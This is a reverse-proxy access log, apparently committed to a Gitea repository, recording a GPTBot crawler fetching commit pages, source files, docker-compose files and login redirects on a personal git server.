"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:15:40:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 68328] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:15:40:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10893] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/docker-compose.yml" -[17/Feb/2026:15:40:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10841] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html" -[17/Feb/2026:15:40:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10867] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.html" -[17/Feb/2026:15:40:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" -[17/Feb/2026:15:40:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/instrument.png" -[17/Feb/2026:15:40:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/images/instrument.png" -[17/Feb/2026:15:40:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/instrument.png" -[17/Feb/2026:15:40:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/images/instrument.png" -[17/Feb/2026:15:40:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=npm%2fdata%2flogs%2ffallback_http_error.log" [Client 74.7.227.38] [Length 26834] [Gzip 7.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:15:40:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=npm%2fdata%2flogs%2ffallback_http_access.log" [Client 74.7.227.38] [Length 38008] [Gzip 10.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:15:40:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/instrument.png" -[17/Feb/2026:15:40:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 944] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/instrument.png" -[17/Feb/2026:15:40:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10892] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.html" -[17/Feb/2026:15:40:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html?display=source" [Client 74.7.227.38] [Length 32429] [Gzip 9.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" -[17/Feb/2026:15:40:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fREADME.md" [Client 74.7.227.38] [Length 31787] [Gzip 7.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/README.md" -[17/Feb/2026:15:40:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14671] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Services.tsx" -[17/Feb/2026:15:40:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Hero.tsx" -[17/Feb/2026:15:40:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Footer.tsx" -[17/Feb/2026:15:40:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16487] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Contact.tsx" -[17/Feb/2026:15:40:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10917] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Contact.tsx" -[17/Feb/2026:15:40:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14830] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Header.tsx" -[17/Feb/2026:15:40:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14213] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Footer.tsx" -[17/Feb/2026:15:40:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Header.tsx" -[17/Feb/2026:15:40:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13942] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/About.tsx" -[17/Feb/2026:15:40:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13892] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Hero.tsx" -[17/Feb/2026:15:40:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/ChatBot.tsx" -[17/Feb/2026:15:40:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Services.tsx" -[17/Feb/2026:15:40:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/About.tsx" -[17/Feb/2026:15:40:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html?display=source" [Client 74.7.227.38] [Length 22664] [Gzip 7.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html" -[17/Feb/2026:15:40:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.html?display=source" [Client 74.7.227.38] [Length 32605] [Gzip 9.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.html" -[17/Feb/2026:15:40:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10848] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" -[17/Feb/2026:15:40:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10885] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/docker-compose.yml" -[17/Feb/2026:15:40:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/DOCKER_QUICKSTART.md?display=rendered" [Client 74.7.227.38] [Length 14319] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:15:40:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/MIGRATION_GUIDE.md?display=rendered" [Client 74.7.227.38] [Length 15812] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:15:40:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/MIGRATION_GUIDE.md?display=source" [Client 74.7.227.38] [Length 20908] [Gzip 6.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:15:40:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/DOCKER_QUICKSTART.md?display=source" [Client 74.7.227.38] [Length 18128] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:15:40:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fletsencrypt" [Client 74.7.227.38] [Length 24886] [Gzip 5.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt" -[17/Feb/2026:15:40:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10887] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/docker-compose.yml" -[17/Feb/2026:15:40:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10891] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/docker-compose.yml" -[17/Feb/2026:15:40:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10888] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/docker-compose.yml" -[17/Feb/2026:15:40:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10888] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/docker-compose.yml" -[17/Feb/2026:15:40:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10859] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/docker-compose.yml" -[17/Feb/2026:15:40:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 12634] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/docker-compose.yml" -[17/Feb/2026:15:40:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10888] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/docker-compose.yml" -[17/Feb/2026:15:40:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10897] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/docker-compose.yml" -[17/Feb/2026:15:40:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 12506] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/docker-compose.yml" -[17/Feb/2026:15:40:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 12813] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:40:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11824] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:40:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12334] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:40:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 12848] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:40:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 13132] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:40:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 12848] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:40:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 11433] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:40:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr 